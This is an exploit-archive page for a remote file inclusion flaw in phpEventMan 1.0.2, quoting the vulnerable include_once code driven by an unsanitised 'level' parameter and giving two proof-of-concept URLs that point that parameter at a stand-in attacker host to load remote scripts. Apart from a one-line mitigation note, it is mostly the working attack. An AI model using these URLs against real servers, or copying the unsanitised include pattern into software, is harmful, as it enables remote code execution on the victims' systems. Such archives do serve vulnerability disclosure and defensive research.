header-logo
Suggest Exploit
vendor:
phpEventMan
by:
Cyber-Security
5.5
CVSS
MEDIUM
Remote File Inclusion
98
CWE
Product Name: phpEventMan
Affected Version From: 1.0.2
Affected Version To: 1.0.2
Patch Exists: NO
Related CWE:
CPE: a:phpeventman:phpeventman:1.0.2
Metasploit:
Other Scripts:
Platforms Tested:
2007

phpEventMan v1.0.2 (level) Remote File Include Exploit

This exploit allows an attacker to include arbitrary files from remote servers.

Mitigation:

The vendor should sanitize user-supplied input to prevent remote file inclusion vulnerabilities.
Source

Exploit-DB raw data:

-----------------------------------------------

phpEventMan v1.0.2 (level) Remote File Include Exploit

-----------------------------------------------

Author: Cyber-Security

cyber-security.org

-----------------------------------------------

Code:

include_once($level."UserMan/controller/common.function.php");
include_once($level."Shared/sharedfunctions.php");

-----------------------------------------------

POC:

www.target.com/script_pat/Shared/controller/text.ctrl.php?level=http://evilscripts ?
www.target.com/script_pat/UserMan/controller/common.function.php?level=http://evilscripts ?

-----------------------------------------------

download: http://sourceforge.net/project/showfiles.php?group_id=169887
-----------------------------------------------
 
Reference: http://www.cyber-security.org/DataDetayAll.asp?Data_id=594

# milw0rm.com [2007-02-01]